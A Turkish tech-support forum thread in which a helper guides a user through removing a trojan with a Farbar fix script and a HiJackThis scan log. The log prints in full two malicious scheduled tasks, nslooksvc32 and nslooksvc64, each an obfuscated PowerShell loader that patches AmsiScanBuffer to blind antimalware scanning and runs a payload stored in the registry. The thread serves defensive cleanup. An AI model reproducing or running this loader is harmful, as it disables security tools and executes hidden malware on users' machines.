KS
KS
AlreadyBroken494
Hectopat
- Katılım
- 21 Nisan 2021
- Mesajlar
- 103
- Çözümler
- 1
Daha fazla
- Cinsiyet
- Erkek
Trojan Win32 Sepeh Gen nasıl temizlenebilir?
- Konuyu başlatan AlreadyBroken494
- Başlangıç Tarihi
- Mesaj 17
- Görüntüleme 3B
acv
Megapat
- Katılım
- 31 Temmuz 2015
- Mesajlar
- 7.594
- Makaleler
- 1
- Çözümler
- 74
Sırasıyla,
Denetim masasından; Kaspersky, McAfee, Trojan Remover, Links ve diğer bilmediğim tüm uygulamaları kaldır.
Aşağıdaki araçları sırayla çalıştırıp kalıntıları temizle.
Kodu kopyaladıktan sonra Farbar'dan Fix tuşuna bas. Fixlog.txt adındaki dosyayı burada paylaş.
Denetim masasından; Kaspersky, McAfee, Trojan Remover, Links ve diğer bilmediğim tüm uygulamaları kaldır.
Aşağıdaki araçları sırayla çalıştırıp kalıntıları temizle.
Kodu kopyaladıktan sonra Farbar'dan Fix tuşuna bas. Fixlog.txt adındaki dosyayı burada paylaş.
Kod:
start::
emptytemp:
virustotal: C:\Windows\System32\DriverStore\FileRepository\u0376944.inf_amd64_7a28758ed8b2ac21\B376966\atieclxx.exe;C:\Users\muhan\AppData\Local\Programs\Blitz\Blitz.exe;C:\Program Files\Mozilla Firefox\firefox.exe;C:\Windows\System32\amdfendrsr.exe;C:\Windows\System32\DriverStore\FileRepository\u0376944.inf_amd64_7a28758ed8b2ac21\B376966\atiesrxx.exe;C:\Program Files\AMD\CNext\CNext\CPUMetricsServer.exe;C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe;D:\Games\Grand Theft Auto V\Launcher\RockstarService.exe;C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe;D:\Razer Gamebooster\Razer Cortex\RzKLService.exe;C:\Windows\system32\Device.dll;C:\Windows\system32\ISDone.dll;C:\Windows\system32\Platform.dll;C:\Windows\bsdsetupDH.dll;C:\Windows\SysWOW64\ADsSecurity.dll;C:\Program Files\AMD\CNext\CNext\QtWebEngineProcess.exe
File: C:\Users\muhan\AppData\Local\Yandex;C:\Users\muhan\AppData\Roaming\SmartSteamEmu;C:\Users\muhan\AppData\LocalLow\Redbeet Interactive;C:\Users\muhan\AppData\Roaming\Windows;C:\Users\muhan\AppData\Local\7b85455024c255fb2d382134ede54108;C:\Users\muhan\AppData\Local\ADMITLoving;C:\Users\muhan\AppData\Local\Cloud Game;(FragSoft) C:\Windows\system32\ISDone.dll;C:\Users\muhan\.opera;C:\Users\muhan\Downloads\.opera
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
BootExecute:
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
Task: {52D709F9-9C14-424B-9077-5D714CEF9E0D} - System32\Tasks\TR_FastScan_AtLogon => C:\Program Files (x86)\Trojan Remover\Trjscan.exe [6467352 2022-01-28] (Simply Super Software -> Simply Super Software)
Task: {709D0865-F852-409F-B5BC-139428474DF8} - System32\Tasks\TR_FastScan_Daily_Yılmaz => C:\Program Files (x86)\Trojan Remover\Trjscan.exe [6467352 2022-01-28] (Simply Super Software -> Simply Super Software)
Task: {96E4AAA5-2DF0-4BF4-AA59-0C9ABDAB6C0A} - System32\Tasks\nslooksvc32 => powershell "function Local:KUUibsYzdVVZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$flCbqwKNrRNgbw,[Parameter(Position=1)][Type]$trxeVYymQW)$paalNHZeNmu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAcces (the data entry has 2227 more characters).
Task: {BFCC12A3-664B-42EB-8B9F-2A4BB1629A5C} - System32\Tasks\TR_AntiHijack => C:\Program Files (x86)\Trojan Remover\TRAntiHJ.exe (No File)
Task: {C9226DF5-08C3-486B-92A1-3039634E7EF5} - System32\Tasks\TR_Updater => C:\Program Files (x86)\Trojan Remover\Trupd.exe [6384408 2022-01-06] (Simply Super Software -> Simply Super Software)
Task: {D1333CC2-6205-4BAE-8ED2-B9A2A50A1599} - System32\Tasks\nslooksvc64 => powershell "function Local:yZzuiYRezadz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EWellkmPyYZzro,[Parameter(Position=1)][Type]$LjtIPhnXDu)$XEsJbemsTkG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAcces (the data entry has 2220 more characters).
Tcpip\..\Interfaces\{05b349b0-aef9-4fed-b459-1625b65a9eda}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{ae71b50f-2054-491a-b219-1eb1f48c7549}: [DhcpNameServer] 192.168.42.129
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 21.3\FFExt\light_plugin_firefox\addon.xpi => not found
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 21.3\FFExt\light_plugin_firefox\addon.xpi => not found
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\kl_prefs_62fbb8f7_c917_4cf7_957a_aad2b8fa768c.js [2022-03-06] <==== ATTENTION (Points to *.cfg file)
FF ExtraCheck: C:\Program Files\mozilla firefox\kl_config_62fbb8f7_c917_4cf7_957a_aad2b8fa768c.cfg [2022-03-06] <==== ATTENTION
CHR Extension: (Safe Torrent Scanner) - C:\Users\muhan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aegnopegbbhjeeiganiajffnalhlkkjb [2022-01-16]
CHR Extension: (Fishing.io) - C:\Users\muhan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ijifibpcinhcgbmclfilhcbcojmkdemh [2021-12-22]
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [971504 2021-12-26] (McAfee, LLC -> McAfee, LLC)
2022-03-06 11:41 - 2022-03-06 11:41 - 000004146 _____ C:\Windows\system32\Tasks\TR_FastScan_Daily_Yılmaz
2022-03-06 11:41 - 2022-03-06 11:41 - 000004004 _____ C:\Windows\system32\Tasks\TR_FastScan_AtLogon
2022-03-06 11:41 - 2022-03-06 11:41 - 000003946 _____ C:\Windows\system32\Tasks\TR_Updater
2022-03-06 11:41 - 2022-03-06 11:41 - 000003786 _____ C:\Windows\system32\Tasks\TR_AntiHijack
2022-03-06 11:41 - 2022-03-06 11:41 - 000001371 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Trojan Remover FastScan.lnk
2022-03-06 11:41 - 2022-03-06 11:41 - 000001271 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Trojan Remover Updater.lnk
2022-03-06 11:41 - 2022-03-06 11:41 - 000001250 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Trojan Remover.lnk
2022-03-06 11:41 - 2022-03-06 11:41 - 000000000 ____D C:\Users\muhan\Documents\Simply Super Software
2022-03-06 11:41 - 2022-03-06 11:41 - 000000000 ____D C:\ProgramData\Simply Super Software
2022-03-06 11:41 - 2022-03-06 11:41 - 000000000 ____D C:\Program Files (x86)\Trojan Remover
2021-12-26 14:45 - 2021-12-26 14:45 - 000000000 ____D C:\ProgramData\McAfee
2021-12-26 14:45 - 2021-12-26 14:45 - 000000000 ____D C:\ProgramData\AVG
2021-12-26 14:45 - 2021-12-26 14:45 - 000000000 ____D C:\Program Files\McAfee
2022-03-03 16:27 - 2022-03-05 14:52 - 000000000 ____D C:\ProgramData\Avast Software
AV: Kaspersky Anti-Virus (Disabled - Up to date) {4F76F112-43EB-40E8-11D8-F7BD1853EA23}
FW: Kaspersky Security Cloud (Disabled) {774D7037-0984-41B0-3A87-5E88E680AD58}
Kaspersky Anti-Virus (HKLM-x32\...\{4FC79BE9-AD63-46C0-9626-E4F6BCE6A976}) (Version: 21.3.10.391 - Kaspersky) Hidden
Links version 1.0 (HKU\S-1-5-21-1593825937-2386105780-1848293327-1005\...\Links_is1) (Version: 1.0 - Links) <==== ATTENTION
ContextMenuHandlers1: [Trojan Remover] -> {52B87208-9CCF-42C9-B88E-069281105805} => C:\Program Files (x86)\Trojan Remover\Trshlex64.dll [2018-10-25] (Simply Super Software -> Simply Super Software)
ContextMenuHandlers2: [Trojan Remover] -> {52B87208-9CCF-42C9-B88E-069281105805} => C:\Program Files (x86)\Trojan Remover\Trshlex64.dll [2018-10-25] (Simply Super Software -> Simply Super Software)
ContextMenuHandlers6: [Trojan Remover] -> {52B87208-9CCF-42C9-B88E-069281105805} => C:\Program Files (x86)\Trojan Remover\Trshlex64.dll [2018-10-25] (Simply Super Software -> Simply Super Software)
FirewallRules: [{9512C89E-6BE2-4C79-8A83-66AE2CB09ACC}] => (Allow) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe => No File
FirewallRules: [{559034AF-7527-45AB-A0AB-59178D3B1518}] => (Allow) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe => No File
FirewallRules: [{B7E90CAA-1493-4949-86A0-F0D04A4CC2A7}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File
FirewallRules: [{9FE56EC5-53B8-4560-9040-28D919EDDAAF}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File
FirewallRules: [{51654940-0E91-496C-94F9-388259243044}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File
FirewallRules: [{2A048AE4-BDFE-4E81-894F-AD0EB00E8DBA}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File
end::
KS
KS
AlreadyBroken494
Hectopat
- Katılım
- 21 Nisan 2021
- Mesajlar
- 103
- Çözümler
- 1
Daha fazla
- Cinsiyet
- Erkek
Fixlog
MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.
www.mediafire.com
Hocam fixlog notu yukarıda fakat farbar recovery otomatik olarak D diskime inmiş Windows C diskimde kurulu sorun olur mu?
@acv hocam neredesiniz.
Son düzenleme:
acv
Megapat
- Katılım
- 31 Temmuz 2015
- Mesajlar
- 7.594
- Makaleler
- 1
- Çözümler
- 74
Olmaz. Chrome'dan Fishing.io ve Safe Torrent Scanner adlı eklentileri kaldırın. Aşağıdaki raporu paylaşın sonrasında.
www.technopat.net
HijackThis Log Paylaşımı ve Çözümleri
Sisteminizde yaşadığınız performans düşüşü, kilitlenme, zararlı etkisi, uygulama hatalarından kaynaklanan sorunsalları analiz etmek ve performans iyileştirmesi, zararlı etkisini inaktif etmek için bize HijackThis yazılımı ile yaptığınız tarama Logunu burada paylaşmanız gerekmektedir...
KS
KS
AlreadyBroken494
Hectopat
- Katılım
- 21 Nisan 2021
- Mesajlar
- 103
- Çözümler
- 1
Daha fazla
- Cinsiyet
- Erkek
Olmaz. Chrome'dan Fishing.io ve Safe Torrent Scanner adlı eklentileri kaldırın. Aşağıdaki raporu paylaşın sonrasında.
HijackThis Log Paylaşımı ve Çözümleri
Sisteminizde yaşadığınız performans düşüşü, kilitlenme, zararlı etkisi, uygulama hatalarından kaynaklanan sorunsalları analiz etmek ve performans iyileştirmesi, zararlı etkisini inaktif etmek için bize HijackThis yazılımı ile yaptığınız tarama Logunu burada paylaşmanız gerekmektedir...
[CODE title="HiJackThis"]Logfile of HiJackThis Fork by Alex Dragokas v.2.10.0.16
Platform: x64 Windows 10 (Pro), 10.0.19043.1526 (ReleaseId: 2009, 21H1), Service Pack: 0
Time: 06.03.2022 - 21:58 (UTC+03:00)
Language: OS: Turkish (0x41F). Display: Turkish (0x41F). Non-Unicode: Turkish (0x41F)
Elevated: Yes
Ran by: Yılmaz (group: Administrators) on DESKTOP-DU3LFJF, FirstRun: yes
Chrome: 96.0.4664.110
Firefox: 97.0.2.8098
Internet Explorer: 11.0.19041.1202
Default: "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "%1" (Firefox)
Boot mode: Normal
Running processes:
Number | Path
1 C:\Program Files\AMD\CNext\CNext\AMDRSServ.exe
1 C:\Program Files\AMD\CNext\CNext\AMDRSSrcExt.exe
1 C:\Program Files\AMD\CNext\CNext\cncmd.exe
1 C:\Program Files\AMD\CNext\CNext\CPUMetricsServer.exe
1 C:\Program Files\AMD\CNext\CNext\QtWebEngineProcess.exe
1 C:\Program Files\AMD\CNext\CNext\RadeonSoftware.exe
1 C:\Program Files\Riot Vanguard\vgc.exe
1 C:\Program Files\Riot Vanguard\vgtray.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2201.10-0\MpCopyAccelerator.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2201.10-0\MsMpEng.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2201.10-0\NisSrv.exe
6 C:\Users\muhan\AppData\Local\Discord\app-1.0.9004\Discord.exe
7 C:\Users\muhan\AppData\Local\Programs\Blitz\Blitz.exe
1 C:\Users\muhan\Desktop\HiJackThis.exe
1 C:\Windows\explorer.exe
1 C:\Windows\System32\amdfendrsr.exe
1 C:\Windows\System32\audiodg.exe
2 C:\Windows\System32\csrss.exe
1 C:\Windows\System32\ctfmon.exe
1 C:\Windows\System32\dasHost.exe
2 C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_3dd75df32535321a\RtkAudUService64.exe
1 C:\Windows\System32\DriverStore\FileRepository\u0376724.inf_amd64_aa44b9d5e398e987\B376581\atieclxx.exe
1 C:\Windows\System32\DriverStore\FileRepository\u0376724.inf_amd64_aa44b9d5e398e987\B376581\atiesrxx.exe
1 C:\Windows\System32\dwm.exe
2 C:\Windows\System32\fontdrvhost.exe
1 C:\Windows\System32\lsass.exe
4 C:\Windows\System32\RuntimeBroker.exe
1 C:\Windows\System32\SearchIndexer.exe
1 C:\Windows\System32\SecurityHealthService.exe
1 C:\Windows\System32\SecurityHealthSystray.exe
1 C:\Windows\System32\services.exe
1 C:\Windows\System32\SettingSyncHost.exe
1 C:\Windows\System32\SgrmBroker.exe
1 C:\Windows\System32\sihost.exe
1 C:\Windows\System32\smartscreen.exe
1 C:\Windows\System32\smss.exe
1 C:\Windows\System32\spoolsv.exe
70 C:\Windows\System32\svchost.exe
1 C:\Windows\System32\taskhostw.exe
2 C:\Windows\System32\wbem\WmiPrvSE.exe
1 C:\Windows\System32\wininit.exe
1 C:\Windows\System32\winlogon.exe
1 C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe
1 C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
1 C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
1 C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
1 C:\Windows\SysWOW64\dllhost.exe
O2 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre1.8.0_51\bin\jp2ssv.dll
O2 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.8.0_51\bin\ssv.dll
O4 - HKCU\..\Run: [com.blitz.app] = C:\Users\muhan\AppData\Local\Programs\Blitz\Blitz.exe --autostart
O4 - HKCU\..\Run: [Discord] = C:\Users\muhan\AppData\Local\Discord\Update.exe --processStart Discord.exe
O4 - HKCU\..\StartupApproved\Run: [Opera GX Browser Assistant] = C:\Users\muhan\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe (2021/05/13)
O4 - HKLM\..\Run: [Riot Vanguard] = C:\Program Files\Riot Vanguard\vgtray.exe
O4 - HKLM\..\Run: [RtkAudUService] = C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_3dd75df32535321a\RtkAudUService64.exe -background
O17 - DHCP DNS 1: 192.168.1.1
O22 - BITS Job: (download) {2982ED1B-9DF7-4A96-8A4F-AF6135D30AB2} - http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/fay7bjcbpgagtaithciieeva4u_20220222.431134436/obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3 -> C:\Users\muhan\AppData\Local\Temp\chrome_BITS_9464_2144227497\obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3
O22 - BITS Job: Fix all (including legit)
O22 - Task (.job): (disabled) (Not scheduled) CreateExplorerShellUnelevatedTask.job - C:\Windows\explorer.exe
O22 - Task (.job): (disabled) nslooksvc32.job - (no file)
O22 - Task (.job): (disabled) nslooksvc64.job - (no file)
O22 - Task: (damaged) C:\Windows\System32\Tasks\McAfee (empty)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc32 (key missing)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc64 (key missing)
O22 - Task: (disabled) \Agent Activation Runtime\S-1-5-21-1593825937-2386105780-1848293327-1001 - C:\Windows\System32\AgentActivationRuntimeStarter.exe
O22 - Task: (disabled) \Agent Activation Runtime\S-1-5-21-1593825937-2386105780-1848293327-1005 - C:\Windows\System32\AgentActivationRuntimeStarter.exe
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\Windows\system32\ProvTool.exe /turn 5 /source ProvRetryTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\Windows\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\Windows\system32\usoclient.exe StartMaintenanceWork (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work - C:\Windows\system32\usoclient.exe StartWork (Microsoft)
O22 - Task: (disabled) googleupdatetaskmachinecore - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
O22 - Task: (disabled) googleupdatetaskmachineua - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: \Microsoft\Windows\Defrag\ScheduledDefrag - C:\Windows\system32\defrag.exe \\?\Volume{d1427864-26fc-4798-9271-6340f51fe19e}\ (Microsoft)
O22 - Task: \Mozilla\Firefox Background Update 308046B0AF4A39CB - C:\Program Files\Mozilla Firefox\firefox.exe --MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 --MOZ_LOG_FILE C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\backgroundupdate.moz_log --backgroundtask backgroundupdate
O22 - Task: \Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB - C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB"
O22 - Task: AMDInstallLauncher - C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe /InstallAUEP
O22 - Task: AMDLinkUpdate - C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe -AMDLinkUpdate
O22 - Task: AMDRyzenMasterSDKTask - C:\Program Files\AMD\CNext\CNext\cpumetricsserver.exe
O22 - Task: Kaspersky_Upgrade_Launcher_{278ADC42-419D-4547-A6CA-5B74BE0AD901} - C:\Program Files\Common Files\AV\Kaspersky Lab\upgrade_launcher.exe /waitUpgrade (file missing)
O22 - Task: ModifyLinkUpdate - C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe -UpdateCurrentUser
O22 - Task: nslooksvc32 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:KUUibsYzdVVZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$flCbqwKNrRNgbw,[Parameter(Position=1)][Type]$trxeVYymQW)$paalNHZeNmu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$paalNHZeNmu.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');$paalNHZeNmu.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$trxeVYymQW,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');Write-Output $paalNHZeNmu.CreateType();}$esKTVjEbEydev=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$BLsWUgXPabQYEv=$esKTVjEbEydev.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zhDFYQRlKZJklGZhJlg=KUUibsYzdVVZ @([String])([IntPtr]);$HouUUsVdZbZakOwaaqnUNb=KUUibsYzdVVZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FjTfoJARZLM=$esKTVjEbEydev.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$qIROLtoHyfQMRl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Load'+'LibraryA')));$BzKZfVwvYaCgfQTdI=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Vir'+'tual'+'Pro'+'tect')));$gqDzMuu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qIROLtoHyfQMRl,$zhDFYQRlKZJklGZhJlg).Invoke('a'+'m'+'si.dll');$thgHnFpRwqzfvbdgl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$gqDzMuu,[Object]('Ams'+'iSc'+'an'+'Buffer')));$tFojzPMnml=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,4,[ref]$tFojzPMnml);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$thgHnFpRwqzfvbdgl,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,0x20,[ref]$tFojzPMnml);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
O22 - Task: nslooksvc64 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:yZzuiYRezadz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EWellkmPyYZzro,[Parameter(Position=1)][Type]$LjtIPhnXDu)$XEsJbemsTkG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$XEsJbemsTkG.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');$XEsJbemsTkG.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$LjtIPhnXDu,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');Write-Output $XEsJbemsTkG.CreateType();}$EznyfjngDAhAs=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$sYOssrpLYJJpjX=$EznyfjngDAhAs.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$aAfmdyFNvhcWtryWFmg=yZzuiYRezadz @([String])([IntPtr]);$iyqMBNsEEaEwzblKaRROoC=yZzuiYRezadz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LUQEzwkExfi=$EznyfjngDAhAs.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$vESqRXeDRnNXMw=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Load'+'LibraryA')));$gsFUORhqEFVSkXOmO=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Vir'+'tual'+'Pro'+'tect')));$MyWMWhO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vESqRXeDRnNXMw,$aAfmdyFNvhcWtryWFmg).Invoke('a'+'m'+'si.dll');$SNXmKatLTctWUQlcY=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$MyWMWhO,[Object]('Ams'+'iSc'+'an'+'Buffer')));$VNvaCoBJHL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,4,[ref]$VNvaCoBJHL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SNXmKatLTctWUQlcY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,0x20,[ref]$VNvaCoBJHL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
O22 - Task: OneDrive Per-Machine Standalone Update Task - C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe
O22 - Task: OneDrive Reporting Task-S-1-5-21-1593825937-2386105780-1848293327-1005 - C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe /reporting
O22 - Task: OneDrive Standalone Update Task-S-1-5-21-1058129444-4087973727-844704433-500 - C:\Users\muhan\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (file missing)
O22 - Task: Opera GX scheduled assistant Autoupdate 1620210764 - C:\Users\muhan\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\muhan\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
O22 - Task: Opera GX scheduled Autoupdate 1618946092 - C:\Users\muhan\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0)
O22 - Task: StartCN - C:\Program Files\AMD\CNext\CNext\cncmd.exe startwithdelay
O22 - Task: StartDVR - C:\Program Files\AMD\CNext\CNext\RSServCmd.exe
O23 - Service R2: AMD Crash Defender Service - C:\Windows\System32\amdfendrsr.exe
O23 - Service R2: AMD External Events Utility - C:\Windows\System32\DriverStore\FileRepository\u0376724.inf_amd64_aa44b9d5e398e987\B376581\atiesrxx.exe
O23 - Service R2: Realtek Audio Universal Service - (RtkAudioUniversalService) - C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_3dd75df32535321a\RtkAudUService64.exe
O23 - Service R2: vgc - C:\Program Files\Riot Vanguard\vgc.exe
O23 - Service S3: BattlEye Service - (BEService) - C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
O23 - Service S3: EasyAntiCheat - C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe
O23 - Service S3: FileSyncHelper - C:\Program Files\Microsoft OneDrive\22.022.0130.0001\FileSyncHelper.exe
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files\Google\Chrome\Application\96.0.4664.110\elevation_service.exe
O23 - Service S3: Google Güncelleme Hizmeti (gupdate) - (gupdate) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc
O23 - Service S3: Google Güncelleme Hizmeti (gupdatem) - (gupdatem) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc
O23 - Service S3: Letasoft Sound Booster Service - (SoundBoosterService) - C:\Program Files (x86)\Letasoft Sound Booster\SoundBoosterService.exe
O23 - Service S3: Mozilla Maintenance Service - (MozillaMaintenance) - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service S3: OneDrive Updater Service - C:\Program Files\Microsoft OneDrive\22.022.0130.0001\OneDriveUpdaterService.exe
